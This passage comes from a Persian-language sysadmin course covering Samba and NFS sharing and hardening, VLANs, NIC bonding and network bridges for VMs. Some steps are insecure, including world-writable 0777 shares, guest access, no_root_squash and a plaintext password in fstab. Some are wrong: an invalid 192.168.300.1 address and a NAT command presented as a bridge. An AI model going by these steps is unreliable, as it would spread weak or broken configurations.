2. Map network drive را انتخاب کنید.
3. یک درایو مانند Z: انتخاب کنید.
4. در قسمت Folder، آدرس اشتراک را وارد کنید:

\\192.168.1.10\Shared

5. تیک Reconnect at sign-in را بزنید و روی Finish کلیک کنید.

---

۵. مدیریت و مانیتورینگ Samba

۵.۱ بررسی کاربران متصل‌شده به سرور Samba

smbstatus

۵.۲ بررسی پیکربندی Samba برای خطاها

testparm

۵.۳ مشاهده لاگ‌های مربوط به Samba

tail -f /var/log/samba/log.smbd

۵.۴ حذف کاربر از Samba

smbpasswd -x smbuser

---

جمع‌بندی

• SMB/CIFS یک پروتکل استاندارد برای به اشتراک‌گذاری فایل‌ها و منابع شبکه‌ای بین سیستم‌های مختلف است.
• Samba در لینوکس امکان پیاده‌سازی یک سرور SMB را برای اشتراک‌گذاری فایل‌ها و مدیریت سطح دسترسی‌ها فراهم می‌کند.
• کلاینت‌های لینوکس و ویندوز می‌توانند به سرور SMB متصل شده و از فضای اشتراک‌گذاری شده استفاده کنند.
• با مدیریت کاربران و سطح دسترسی‌ها، می‌توان امنیت و کنترل بهتری روی اشتراک‌گذاری‌ها اعمال کرد.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تنظیمات اشتراک‌گذاری فایل در Linux و Windows” subtitle=”توضیحات کامل”]اشتراک‌گذاری فایل‌ها بین سیستم‌های لینوکس و ویندوز برای انتقال داده‌ها، همکاری تیمی و مدیریت منابع شبکه ضروری است. روش‌های مختلفی برای این کار وجود دارد که در این بخش Samba (SMB/CIFS) برای ارتباط بین ویندوز و لینوکس و NFS برای ارتباط بین لینوکس‌ها بررسی می‌شود.

---

۱. اشتراک‌گذاری فایل‌ها در لینوکس با استفاده از Samba (SMB/CIFS)

۱.۱ نصب Samba در سرور لینوکس (Ubuntu/Debian)

apt update && apt install -y samba

۱.۲ ایجاد دایرکتوری برای اشتراک‌گذاری

mkdir -p /srv/smb/shared
chmod 777 /srv/smb/shared

۱.۳ ویرایش فایل تنظیمات Samba

nano /etc/samba/smb.conf

اضافه کردن تنظیمات:

[Shared]
    path = /srv/smb/shared
    browsable = yes
    writable = yes
    guest ok = yes
    create mask = 0777
    directory mask = 0777

۱.۴ راه‌اندازی مجدد سرویس Samba

systemctl restart smbd

۱.۵ بررسی وضعیت Samba

systemctl status smbd

۱.۶ افزودن کاربر برای دسترسی احراز هویت‌شده

useradd -M -s /sbin/nologin smbuser
smbpasswd -a smbuser

۱.۷ تنظیمات سطح دسترسی برای کاربران خاص

ویرایش smb.conf:

[Shared]
    path = /srv/smb/shared
    browsable = yes
    writable = yes
    guest ok = no
    valid users = smbuser
    create mask = 0770
    directory mask = 0770

سپس راه‌اندازی مجدد Samba:

systemctl restart smbd

---

۲. اتصال به Samba از ویندوز

۲.۱ اتصال به اشتراک Samba در File Explorer

۱. کلید Win + R را بزنید و دستور زیر را وارد کنید:

\\192.168.1.10\Shared

۲. نام کاربری و رمز عبور را وارد کنید.
۳. فایل‌ها نمایش داده خواهند شد.

۲.۲ مانت کردن Samba به‌عنوان درایو شبکه‌ای

۱. در File Explorer روی This PC کلیک کنید.
۲. گزینه Map network drive را انتخاب کنید.
۳. یک درایو مثل Z: را انتخاب کنید.
۴. در قسمت Folder آدرس را وارد کنید:

\\192.168.1.10\Shared

۵. گزینه Reconnect at sign-in را فعال کنید و Finish را بزنید.

---

۳. اشتراک‌گذاری فایل‌ها در لینوکس با استفاده از NFS

۳.۱ نصب NFS در سرور لینوکس (Ubuntu/Debian)

apt update && apt install -y nfs-kernel-server

۳.۲ ایجاد دایرکتوری برای اشتراک‌گذاری و تنظیمات سطح دسترسی

mkdir -p /srv/nfs/shared
chmod 777 /srv/nfs/shared

۳.۳ ویرایش فایل تنظیمات NFS در مسیر /etc/exports

nano /etc/exports

اضافه کردن:

/srv/nfs/shared 192.168.1.0/24(rw,sync,no_root_squash,no_subtree_check)

۳.۴ راه‌اندازی مجدد سرویس NFS

systemctl restart nfs-kernel-server

۳.۵ بررسی وضعیت سرویس NFS

systemctl status nfs-kernel-server

---

۴. اتصال به NFS در کلاینت لینوکس

۴.۱ نصب بسته‌های NFS در کلاینت

apt install -y nfs-common

۴.۲ مانت کردن اشتراک NFS به‌صورت دستی

mount -t nfs 192.168.1.10:/srv/nfs/shared /mnt

۴.۳ اضافه کردن به /etc/fstab برای مانت خودکار

nano /etc/fstab

اضافه کردن خط زیر:

192.168.1.10:/srv/nfs/shared /mnt nfs defaults 0 0

۴.۴ بررسی اتصال و دسترسی به فایل‌ها

ls -lah /mnt

۴.۵ قطع اتصال اشتراک NFS

umount /mnt

---

۵. اشتراک‌گذاری فایل‌ها در ویندوز (Folder Sharing)

۵.۱ اشتراک‌گذاری پوشه در ویندوز

۱. روی پوشه موردنظر کلیک راست کنید و Properties را انتخاب کنید.
۲. به تب Sharing بروید و روی Advanced Sharing کلیک کنید.
۳. گزینه Share this folder را فعال کنید و نام اشتراک را مشخص کنید.
۴. روی Permissions کلیک کرده و سطح دسترسی کاربران را مشخص کنید.
۵. روی OK کلیک کنید تا تنظیمات ذخیره شوند.

۵.۲ مشاهده اشتراک‌های فعال در ویندوز

net share

۵.۳ دسترسی به اشتراک از لینوکس

apt install -y cifs-utils
mount -t cifs -o username=windows_user,password=windows_password //192.168.1.10/Shared /mnt

۵.۴ اضافه کردن به /etc/fstab برای مانت خودکار

nano /etc/fstab

اضافه کردن:

//192.168.1.10/Shared /mnt cifs username=windows_user,password=windows_password,iocharset=utf8 0 0

۵.۵ بررسی اتصال و مشاهده فایل‌های اشتراک‌گذاری شده

ls -lah /mnt

۵.۶ قطع اتصال اشتراک ویندوز

umount /mnt

---

جمع‌بندی

• Samba (SMB/CIFS) برای ارتباط بین لینوکس و ویندوز استفاده می‌شود و امکان به اشتراک‌گذاری فایل‌ها با احراز هویت و تنظیمات امنیتی را فراهم می‌کند.
• NFS برای اشتراک‌گذاری فایل بین سیستم‌های لینوکس بهینه است و عملکرد بالایی دارد.
• در ویندوز، از File Sharing برای اشتراک‌گذاری فایل‌ها و از net share برای مدیریت اشتراک‌ها استفاده می‌شود.
• با استفاده از fstab می‌توان مانت خودکار را در لینوکس پیکربندی کرد و از Map Network Drive در ویندوز برای اتصال دائمی به اشتراک‌ها بهره برد.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تنظیمات امنیتی و محدود کردن دسترسی‌ها در اشتراک‌گذاری فایل” subtitle=”توضیحات کامل”]امنیت در اشتراک‌گذاری فایل اهمیت زیادی دارد، زیرا دسترسی غیرمجاز می‌تواند باعث افشای اطلاعات حساس، حذف یا تغییر داده‌ها شود. در این بخش، راهکارهای امنیتی برای Samba (SMB/CIFS)، NFS و اشتراک‌گذاری فایل در ویندوز بررسی خواهد شد.

---

۱. تنظیمات امنیتی در Samba (SMB/CIFS)

۱.۱ غیرفعال کردن دسترسی ناشناس (Guest Access)

در فایل /etc/samba/smb.conf مقدار guest ok = no را تنظیم کنید:

nano /etc/samba/smb.conf

اضافه کردن:

[Shared]
    path = /srv/smb/shared
    browsable = yes
    writable = yes
    guest ok = no
    valid users = smbuser
    create mask = 0700
    directory mask = 0700

ذخیره و راه‌اندازی مجدد Samba:

systemctl restart smbd

۱.۲ ایجاد کاربران خاص برای Samba

useradd -M -s /sbin/nologin smbuser
smbpasswd -a smbuser

۱.۳ تنظیم سطح دسترسی به فایل‌ها و دایرکتوری‌های Samba

chmod -R 700 /srv/smb/shared
chown -R smbuser:smbuser /srv/smb/shared

۱.۴ مسدود کردن کاربران ناشناس از اتصال به Samba

در فایل /etc/samba/smb.conf گزینه‌های زیر را تنظیم کنید:

restrict anonymous = 2

سپس سرویس را راه‌اندازی مجدد کنید:

systemctl restart smbd

۱.۵ محدود کردن دسترسی Samba بر اساس آدرس IP

[Shared]
    path = /srv/smb/shared
    browsable = yes
    writable = yes
    valid users = smbuser
    hosts allow = 192.168.1.0/24
    hosts deny = 0.0.0.0/0

پس از تغییرات، راه‌اندازی مجدد Samba:

systemctl restart smbd

---

۲. تنظیمات امنیتی در NFS

۲.۱ محدود کردن دسترسی کلاینت‌ها در فایل /etc/exports

nano /etc/exports

مثال تنظیمات:

/srv/nfs/shared 192.168.1.10(rw,sync,no_root_squash,no_subtree_check)
/srv/nfs/shared 192.168.1.0/24(ro,sync,no_subtree_check)

سپس راه‌اندازی مجدد NFS:

exportfs -ra
systemctl restart nfs-kernel-server

۲.۲ بررسی دسترسی‌ها به NFS و بستن پورت‌های غیرضروری

rpcinfo -p
netstat -tunlp | grep nfs

۲.۳ تنظیم فایروال برای NFS

ufw allow from 192.168.1.0/24 to any port 2049
ufw enable

---

۳. تنظیمات امنیتی در اشتراک‌گذاری فایل ویندوز

۳.۱ تعیین مجوزهای دسترسی کاربران

۱. روی پوشه اشتراک‌گذاری‌شده کلیک راست کنید و Properties را انتخاب کنید.
2. در تب Security روی Edit کلیک کنید.
3. کاربران مجاز را مشخص کرده و Read یا Full Control را تنظیم کنید.
4. کاربران غیرمجاز را Remove کنید.

۳.۲ محدود کردن اشتراک‌ها در سطح شبکه

در Run (Win + R) تایپ کنید:

gpedit.msc

مسیر زیر را باز کنید:

Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options

گزینه “Network access: Shares that can be accessed anonymously” را غیرفعال کنید.

۳.۳ غیرفعال کردن SMBv1 و تنظیمات امنیتی بالاتر

sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled

۳.۴ مشاهده و حذف اشتراک‌های ناخواسته در ویندوز

مشاهده اشتراک‌ها:

net share

حذف اشتراک ناخواسته:

net share SharedFolder /delete

---

۴. تنظیمات فایروال برای محدود کردن دسترسی‌ها

۴.۱ محدود کردن دسترسی Samba در لینوکس

ufw allow from 192.168.1.0/24 to any port 445
ufw enable

۴.۲ بستن پورت‌های غیرضروری برای امنیت بیشتر

ufw deny 111/tcp
ufw deny 111/udp
ufw deny 2049/tcp
ufw deny 2049/udp

۴.۳ مشاهده و تأیید تنظیمات فایروال

ufw status verbose

---

۵. استفاده از SELinux و AppArmor برای افزایش امنیت

۵.۱ بررسی وضعیت SELinux

sestatus

اگر غیرفعال است، فعال کنید:

setenforce 1

۵.۲ محدود کردن سطح دسترسی سرویس‌ها با AppArmor

aa-status

محدود کردن smbd:

nano /etc/apparmor.d/usr.sbin.smbd

اضافه کردن:

deny /srv/smb/private/** rw,

سپس سرویس را بازخوانی کنید:

apparmor_parser -r /etc/apparmor.d/usr.sbin.smbd

---

جمع‌بندی

• Samba: باید دسترسی ناشناس را غیرفعال کرد، کاربران خاص را تعریف کرد و دسترسی را بر اساس IP محدود کرد.
• NFS: باید فقط کلاینت‌های مجاز را مشخص کرد و از no_root_squash فقط در موارد خاص استفاده کرد.
• ویندوز: باید دسترسی‌های اشتراک را دقیق تنظیم کرد، SMBv1 را غیرفعال کرد و از gpedit.msc برای امنیت بیشتر استفاده کرد.
• فایروال: باید پورت‌های غیرضروری را بست و فقط دسترسی‌های مجاز را از طریق ufw یا iptables باز گذاشت.
• SELinux و AppArmor: برای کنترل دقیق‌تر دسترسی‌ها توصیه می‌شود.

[/cdb_course_lesson][/cdb_course_lessons]

[cdb_course_lessons title=”بخش 2: مدیریت شبکه پیشرفته”][cdb_course_lesson title=”فصل 1. تنظیمات شبکه پیشرفته”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تعریف و پیکربندی VLAN (Virtual Local Area Network)” subtitle=”توضیحات کامل”]VLAN یا شبکه محلی مجازی، یک روش برای تقسیم‌بندی منطقی شبکه در لایه 2 (Data Link) است که به دستگاه‌های مختلف اجازه می‌دهد در یک سوئیچ فیزیکی ولی در شبکه‌های مختلف ارتباط برقرار کنند. VLAN باعث بهبود امنیت، کاهش ترافیک برودکست و مدیریت ساده‌تر شبکه می‌شود.

در این بخش، نحوه تعریف و پیکربندی VLAN در سوئیچ‌های مدیریتی و سیستم‌عامل‌های لینوکس و ویندوز بررسی خواهد شد.

---

۱. تنظیم VLAN در سوئیچ‌های مدیریتی (Cisco, HP, Mikrotik)

۱.۱ تنظیم VLAN در سوئیچ‌های Cisco

وارد مد پیکربندی شوید:

enable
configure terminal

ایجاد VLAN و نام‌گذاری آن:

vlan 10
name HR
exit

اختصاص پورت به VLAN 10:

interface FastEthernet0/1
switchport mode access
switchport access vlan 10
exit

بررسی تنظیمات VLAN:

show vlan brief

۱.۲ تنظیم VLAN در سوئیچ‌های HP

vlan 20
name Finance
exit
interface 1
untagged vlan 20
exit

بررسی VLANها:

show vlan

۱.۳ تنظیم VLAN در سوئیچ‌های Mikrotik

/interface vlan add name=VLAN30 vlan-id=30 interface=ether1
/ip address add address=192.168.30.1/24 interface=VLAN30

مشاهده VLANها:

/interface vlan print

---

۲. تنظیم VLAN در لینوکس

۲.۱ نصب بسته‌های موردنیاز

در سیستم‌های مبتنی بر Debian/Ubuntu:

apt update && apt install vlan -y

در سیستم‌های مبتنی بر RHEL/CentOS:

yum install -y vlan

۲.۲ فعال‌سازی 802.1Q Kernel Module

modprobe 8021q
echo "8021q" >> /etc/modules

۲.۳ تنظیم VLAN به‌صورت موقت

ایجاد یک VLAN روی اینترفیس eth0:

ip link add link eth0 name eth0.100 type vlan id 100
ip addr add 192.168.100.1/24 dev eth0.100
ip link set dev eth0.100 up

مشاهده وضعیت VLAN:

ip -d link show eth0.100

۲.۴ تنظیم VLAN به‌صورت دائمی در Debian/Ubuntu

ویرایش فایل:

nano /etc/network/interfaces

افزودن تنظیمات:

auto eth0.200
iface eth0.200 inet static
    address 192.168.200.1
    netmask 255.255.255.0
    vlan-raw-device eth0

اعمال تغییرات:

systemctl restart networking

۲.۵ تنظیم VLAN به‌صورت دائمی در RHEL/CentOS

ایجاد فایل:

nano /etc/sysconfig/network-scripts/ifcfg-eth0.300

افزودن:

DEVICE=eth0.300
BOOTPROTO=static
ONBOOT=yes
IPADDR=192.168.300.1
NETMASK=255.255.255.0
VLAN=yes

راه‌اندازی مجدد:

systemctl restart network

---

۳. تنظیم VLAN در ویندوز

۳.۱ فعال‌سازی VLAN در کارت شبکه

۱. در Device Manager، کارت شبکه را انتخاب کنید.
۲. روی Properties کلیک کنید.
۳. در تب Advanced، گزینه VLAN ID را پیدا کنید و مقدار موردنظر (مثلاً 400) را وارد کنید.

۳.۲ تنظیم VLAN با PowerShell

مشاهده اینترفیس‌های شبکه:

Get-NetAdapter

تنظیم VLAN:

Set-NetAdapter -Name "Ethernet" -VlanID 400

بررسی تنظیمات:

Get-NetAdapterAdvancedProperty -Name "Ethernet" -DisplayName "VLAN ID"

---

۴. تنظیمات VLAN Trunk و Inter-VLAN Routing

۴.۱ تنظیم Trunk در سوئیچ‌های Cisco

interface GigabitEthernet0/1
switchport mode trunk
switchport trunk allowed vlan 10,20,30
exit

۴.۲ فعال‌سازی Inter-VLAN Routing در روتر Cisco

interface vlan 10
ip address 192.168.10.1 255.255.255.0
exit

interface vlan 20
ip address 192.168.20.1 255.255.255.0
exit

ip routing

۴.۳ تنظیم Inter-VLAN Routing در لینوکس

echo 1 > /proc/sys/net/ipv4/ip_forward

یا در فایل /etc/sysctl.conf مقدار زیر را اضافه کنید:

net.ipv4.ip_forward = 1

اعمال تغییرات:

sysctl -p

---

جمع‌بندی

• در سوئیچ‌های مدیریتی، VLANها از طریق CLI تنظیم می‌شوند و هر VLAN می‌تواند محدوده‌ای از کاربران را جدا کند.
• در لینوکس، VLANها به‌صورت اینترفیس‌های مجازی تعریف می‌شوند و در فایل‌های /etc/network/interfaces یا /etc/sysconfig/network-scripts/ ذخیره می‌شوند.
• در ویندوز، VLAN معمولاً از طریق تنظیمات کارت شبکه یا PowerShell تنظیم می‌شود.
• برای ارتباط VLANها، از Trunk و Inter-VLAN Routing استفاده می‌شود که روی روتر یا سوئیچ لایه ۳ قابل تنظیم است.

 [/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”مفهوم و نحوه پیاده‌سازی Bonding/Teaming برای افزایش سرعت و پایداری شبکه” subtitle=”توضیحات کامل”]شبکه‌های امروزی نیازمند افزایش پهنای باند، کاهش تأخیر و افزایش پایداری ارتباطات هستند. برای دستیابی به این هدف، روش‌هایی مانند VLAN برای جداسازی منطقی شبکه‌ها و Bonding/Teaming برای ترکیب چندین اینترفیس شبکه استفاده می‌شوند.

در این بخش، مفهوم Bonding/Teaming، نحوه پیاده‌سازی آن در سیستم‌های لینوکس و ویندوز و ارتباط آن با VLAN بررسی خواهد شد.

---

۱. مفهوم Bonding و Teaming

۱.۱ Bonding در لینوکس

Bonding یک روش برای ترکیب چندین کارت شبکه (NIC) به یک رابط واحد است که باعث افزایش پهنای باند و افزونگی (Redundancy) می‌شود. لینوکس از Bonding Driver برای این کار استفاده می‌کند و می‌تواند در حالت‌های مختلفی مانند Load Balancing، High Availability و Failover اجرا شود.

۱.۲ Teaming در ویندوز

Teaming در ویندوز عملکرد مشابهی دارد و به مدیریت چندین کارت شبکه تحت یک رابط مجازی کمک می‌کند. این روش توسط Windows Server NIC Teaming پیاده‌سازی می‌شود و بهبود پایداری و تحمل خرابی (Failover) را تضمین می‌کند.

---

۲. پیاده‌سازی Bonding در لینوکس

۲.۱ نصب بسته‌های موردنیاز

در Debian/Ubuntu:

apt update && apt install ifenslave -y

در RHEL/CentOS:

yum install -y teamd

۲.۲ فعال‌سازی ماژول Bonding در کرنل

modprobe bonding
echo "bonding" >> /etc/modules

۲.۳ پیکربندی Bonding به‌صورت دائمی (Debian/Ubuntu)

ویرایش فایل:

nano /etc/network/interfaces

افزودن تنظیمات:

auto bond0
iface bond0 inet static
    address 192.168.1.100
    netmask 255.255.255.0
    gateway 192.168.1.1
    bond-mode 802.3ad
    bond-miimon 100
    bond-slaves eth0 eth1

اعمال تغییرات:

systemctl restart networking

۲.۴ پیکربندی Bonding در RHEL/CentOS

ایجاد فایل تنظیمات:

nano /etc/sysconfig/network-scripts/ifcfg-bond0

افزودن:

DEVICE=bond0
BOOTPROTO=static
IPADDR=192.168.1.100
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
ONBOOT=yes
BONDING_OPTS="mode=802.3ad miimon=100"

ویرایش فایل اینترفیس‌ها:

nano /etc/sysconfig/network-scripts/ifcfg-eth0

افزودن:

DEVICE=eth0
ONBOOT=yes
MASTER=bond0
SLAVE=yes

اعمال تنظیمات:

systemctl restart network

---

۳. پیکربندی NIC Teaming در ویندوز

۳.۱ ایجاد Team در Windows Server

۱. در Server Manager به Local Server بروید.
2. روی NIC Teaming کلیک کنید.
3. New Team را انتخاب کرده و کارت‌های شبکه موردنظر را اضافه کنید.
4. یکی از مودهای زیر را انتخاب کنید:

• Switch Independent (مناسب برای اتصال به سوئیچ‌های مختلف)
• Static Teaming (نیازمند تنظیم دستی در سوئیچ)
• LACP (توافق خودکار با سوئیچ)

۳.۲ ایجاد NIC Teaming با PowerShell

مشاهده کارت‌های شبکه:

Get-NetAdapter

ایجاد یک Team با دو کارت شبکه:

New-NetLbfoTeam -Name "Team1" -TeamMembers "Ethernet1", "Ethernet2" -TeamingMode LACP -LoadBalancingAlgorithm Dynamic

بررسی وضعیت:

Get-NetLbfoTeam

---

۴. ادغام Bonding/Teaming با VLAN

۴.۱ تنظیم VLAN روی Bonding در لینوکس

ویرایش فایل /etc/network/interfaces:

auto bond0.10
iface bond0.10 inet static
    address 192.168.10.1
    netmask 255.255.255.0
    vlan-raw-device bond0

راه‌اندازی مجدد شبکه:

systemctl restart networking

۴.۲ تنظیم VLAN روی NIC Teaming در ویندوز

با PowerShell:

Set-NetAdapter -Name "Team1" -VlanID 10

بررسی VLAN:

Get-NetAdapterAdvancedProperty -Name "Team1" -DisplayName "VLAN ID"

---

جمع‌بندی

• Bonding در لینوکس و Teaming در ویندوز، هر دو روش‌هایی برای افزایش پهنای باند و تحمل خرابی هستند.
• Bonding در لینوکس از طریق تنظیمات /etc/network/interfaces و /etc/sysconfig/network-scripts/ انجام می‌شود.
• NIC Teaming در ویندوز از طریق Server Manager یا PowerShell قابل تنظیم است.
• می‌توان VLAN را روی Bonding/Teaming پیاده‌سازی کرد تا مدیریت ترافیک شبکه بهینه شود.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تعریف و پیکربندی Network Bridge برای ارتباط میان شبکه‌ها” subtitle=”توضیحات کامل”]Network Bridge (پل شبکه) یکی از روش‌های اتصال چندین رابط شبکه به یکدیگر است که به عنوان یک سوئیچ مجازی در سیستم‌عامل عمل می‌کند. این روش در محیط‌های مجازی‌سازی، سرورها و همچنین در تنظیمات شبکه‌های گسترده برای ایجاد ارتباط میان چندین شبکه استفاده می‌شود.

در این بخش، به صورت جامع و عملی، نحوه ایجاد و پیکربندی یک Network Bridge در لینوکس و ویندوز بررسی خواهد شد.

---

۱. مفهوم Network Bridge

Network Bridge به سیستم اجازه می‌دهد چندین کارت شبکه را در یک رابط مشترک تجمیع کند تا ارتباط مستقیم بین آن‌ها برقرار شود. این قابلیت در موارد زیر کاربرد دارد:

• اتصال چندین شبکه LAN به یکدیگر
• مجازی‌سازی و ایجاد شبکه مجازی برای ماشین‌های مجازی (VMs)
• توزیع ترافیک بین چندین رابط شبکه برای بهینه‌سازی ارتباطات

در سیستم‌عامل‌های مختلف، Bridge می‌تواند با یا بدون IP پیکربندی شود. در ادامه نحوه پیکربندی آن در لینوکس و ویندوز توضیح داده خواهد شد.

---

۲. ایجاد و پیکربندی Network Bridge در لینوکس

۲.۱ نصب ابزارهای مورد نیاز

در Debian/Ubuntu:

apt update && apt install bridge-utils net-tools -y

در RHEL/CentOS:

yum install -y bridge-utils

۲.۲ ایجاد Bridge و افزودن اینترفیس‌ها (دستی – موقت)

ایجاد یک Bridge جدید:

ip link add name br0 type bridge

افزودن کارت‌های شبکه به Bridge:

ip link set eth0 master br0
ip link set eth1 master br0

فعال‌سازی Bridge:

ip link set br0 up

بررسی وضعیت Bridge:

ip addr show br0

نکته: این تنظیمات پس از ری‌استارت سیستم از بین می‌رود و باید برای دائمی کردن آن‌ها از روش زیر استفاده کرد.

---

۲.۳ پیکربندی دائمی Network Bridge در Debian/Ubuntu

ویرایش فایل /etc/network/interfaces:

nano /etc/network/interfaces

افزودن تنظیمات زیر:

auto br0
iface br0 inet static
    address 192.168.1.100
    netmask 255.255.255.0
    gateway 192.168.1.1
    bridge_ports eth0 eth1

اعمال تغییرات:

systemctl restart networking

---

۲.۴ پیکربندی دائمی Network Bridge در RHEL/CentOS

ایجاد فایل /etc/sysconfig/network-scripts/ifcfg-br0:

nano /etc/sysconfig/network-scripts/ifcfg-br0

افزودن تنظیمات زیر:

DEVICE=br0
TYPE=Bridge
BOOTPROTO=static
IPADDR=192.168.1.100
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
ONBOOT=yes

ویرایش فایل /etc/sysconfig/network-scripts/ifcfg-eth0:

nano /etc/sysconfig/network-scripts/ifcfg-eth0

افزودن:

DEVICE=eth0
ONBOOT=yes
BRIDGE=br0

اعمال تغییرات:

systemctl restart network

---

۳. ایجاد و پیکربندی Network Bridge در ویندوز

۳.۱ ایجاد Bridge با رابط گرافیکی

۱. به Control Panel → Network and Sharing Center بروید.
2. روی Change adapter settings کلیک کنید.
3. کارت‌های شبکه‌ای که می‌خواهید در Bridge باشند، انتخاب کنید.
4. روی آن‌ها کلیک راست کرده و گزینه Bridge Connections را انتخاب کنید.
5. چند لحظه صبر کنید تا Windows Bridge ایجاد شود.

۳.۲ ایجاد Bridge در ویندوز با PowerShell

نمایش لیست کارت‌های شبکه:

Get-NetAdapter

ایجاد یک Bridge جدید:

New-NetIPAddress -InterfaceAlias "Ethernet 2" -IPAddress 192.168.1.100 -PrefixLength 24 -DefaultGateway 192.168.1.1
New-NetNat -Name "BridgeNAT" -InternalIPInterfaceAddressPrefix 192.168.1.0/24

بررسی وضعیت Bridge:

Get-NetIPAddress

---

۴. استفاده از Network Bridge برای ماشین‌های مجازی

۴.۱ ایجاد Bridge در KVM/QEMU

virsh iface-bridge eth0 br0

یا ویرایش فایل XML ماشین مجازی:

<interface type='bridge'>
  <source bridge='br0'/>
  <model type='virtio'/>
</interface>

۴.۲ تنظیم Bridge در VirtualBox

۱. وارد تنظیمات ماشین مجازی شوید.
2. در بخش Network → Adapter 1، گزینه Bridged Adapter را انتخاب کنید.
3. از لیست کارت شبکه‌ها، br0 را انتخاب کرده و ذخیره کنید.

۴.۳ تنظیم Bridge در VMware

1. وارد تنظیمات ماشین مجازی شوید.
2. در قسمت Network Adapter، گزینه Bridged Networking را فعال کنید.

---

جمع‌بندی

• Network Bridge به سیستم اجازه می‌دهد چندین کارت شبکه را به‌عنوان یک رابط مجازی ترکیب کند.
• در لینوکس، Bridge از طریق bridge-utils و ip link مدیریت می‌شود و برای پیکربندی دائمی باید فایل‌های تنظیمات ویرایش شوند.
• در ویندوز، Bridge را می‌توان از طریق کنترل پنل یا PowerShell ایجاد کرد.
• ماشین‌های مجازی مانند KVM، VirtualBox و VMware از Network Bridge برای ارتباط مستقیم با شبکه استفاده می‌کنند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”استفاده از Bridge برای اتصال ماشین‌های مجازی به شبکه‌های فیزیکی” subtitle=”توضیحات کامل”]در محیط‌های مجازی‌سازی، یکی از مهم‌ترین چالش‌ها، اتصال ماشین‌های مجازی (VM) به شبکه فیزیکی است تا بتوانند مانند یک سرور یا کلاینت واقعی در شبکه فعالیت کنند. برای حل این مشکل، از Bridge Networking استفاده می‌شود.

این روش باعث می‌شود که ماشین مجازی به‌طور مستقیم به شبکه فیزیکی متصل شود، مانند یک کامپیوتر واقعی آدرس IP از DHCP بگیرد و بتواند با سایر دستگاه‌های موجود در شبکه فیزیکی ارتباط برقرار کند.

---

۱. مزایای استفاده از Network Bridge برای ماشین‌های مجازی

• اتصال مستقیم ماشین مجازی به شبکه فیزیکی (بدون نیاز به NAT)
• دریافت آدرس IP از DHCP شبکه (در صورت فعال بودن DHCP)
• ارتباط بدون محدودیت بین ماشین مجازی و دیگر سیستم‌های شبکه
• امکان اجرای سرویس‌هایی مانند وب‌سرور، دیتابیس و غیره روی VM و دسترسی از بیرون

---

۲. ایجاد و پیکربندی Network Bridge در لینوکس برای ماشین‌های مجازی

۲.۱ نصب ابزارهای مورد نیاز

در Debian/Ubuntu:

apt update && apt install -y bridge-utils net-tools

در RHEL/CentOS:

yum install -y bridge-utils

۲.۲ ایجاد یک Bridge جدید در لینوکس

ایجاد یک Bridge جدید به نام br0:

ip link add name br0 type bridge
ip link set br0 up

افزودن کارت شبکه اصلی به Bridge:

ip link set eth0 master br0

بررسی وضعیت Bridge:

ip addr show br0

نکته: این تنظیمات پس از ری‌استارت سیستم از بین می‌رود. برای دائمی کردن آن، باید فایل تنظیمات را ویرایش کنیم.

---

۲.۳ پیکربندی دائمی Network Bridge در Debian/Ubuntu

ویرایش فایل /etc/network/interfaces:

nano /etc/network/interfaces

افزودن تنظیمات زیر:

auto br0
iface br0 inet dhcp
    bridge_ports eth0

اعمال تغییرات:

systemctl restart networking

---

۲.۴ پیکربندی دائمی Network Bridge در RHEL/CentOS

ایجاد فایل /etc/sysconfig/network-scripts/ifcfg-br0:

nano /etc/sysconfig/network-scripts/ifcfg-br0

افزودن تنظیمات زیر:

DEVICE=br0
TYPE=Bridge
BOOTPROTO=dhcp
ONBOOT=yes

ویرایش فایل /etc/sysconfig/network-scripts/ifcfg-eth0:

nano /etc/sysconfig/network-scripts/ifcfg-eth0

افزودن:

DEVICE=eth0
ONBOOT=yes
BRIDGE=br0

اعمال تغییرات:

systemctl restart network

---

۳. تنظیم Bridge در ماشین‌های مجازی KVM/QEMU

۳.۱ ایجاد Bridge در KVM با virsh

اتصال یک کارت شبکه به Bridge:

virsh iface-bridge eth0 br0

یا ایجاد یک Bridge از طریق XML در KVM:

<interface type='bridge'>
  <source bridge='br0'/>
  <model type='virtio'/>
</interface>

۳.۲ پیکربندی Bridge در VirtualBox

۱. وارد تنظیمات ماشین مجازی شوید.
2. در بخش Network → Adapter 1، گزینه Bridged Adapter را انتخاب کنید.
3. از لیست کارت شبکه‌ها، br0 را انتخاب کرده و ذخیره کنید.

۳.۳ تنظیم Bridge در VMware

1. وارد تنظیمات ماشین مجازی شوید.
2. در قسمت Network Adapter، گزینه Bridged Networking را فعال کنید.

---

۴. ایجاد و پیکربندی Bridge در ویندوز برای ماشین‌های مجازی

۴.۱ ایجاد Bridge در ویندوز از طریق GUI

1. به Control Panel → Network and Sharing Center بروید.
2. روی Change adapter settings کلیک کنید.
3. کارت‌های شبکه فیزیکی و مجازی را انتخاب کنید.
4. روی آن‌ها کلیک راست کرده و گزینه Bridge Connections را انتخاب کنید.

۴.۲ ایجاد Bridge در ویندوز با PowerShell

نمایش لیست کارت‌های شبکه:

Get-NetAdapter

ایجاد Bridge:

New-VMSwitch -Name "BridgeSwitch" -NetAdapterName "Ethernet" -AllowManagementOS $true

بررسی تنظیمات:

Get-VMSwitch

---

۵. تست اتصال ماشین‌های مجازی به شبکه فیزیکی

پس از تنظیم Bridge، بررسی کنید که ماشین مجازی به درستی متصل شده است:

۵.۱ بررسی دریافت IP در ماشین مجازی

در لینوکس:

ip addr show

در ویندوز:

ipconfig /all

۵.۲ تست ارتباط با شبکه فیزیکی

از ماشین مجازی، Ping به Gateway شبکه بفرستید:

ping 192.168.1.1

---

جمع‌بندی

• Bridge Networking یک روش کاربردی برای اتصال ماشین‌های مجازی به شبکه فیزیکی است.
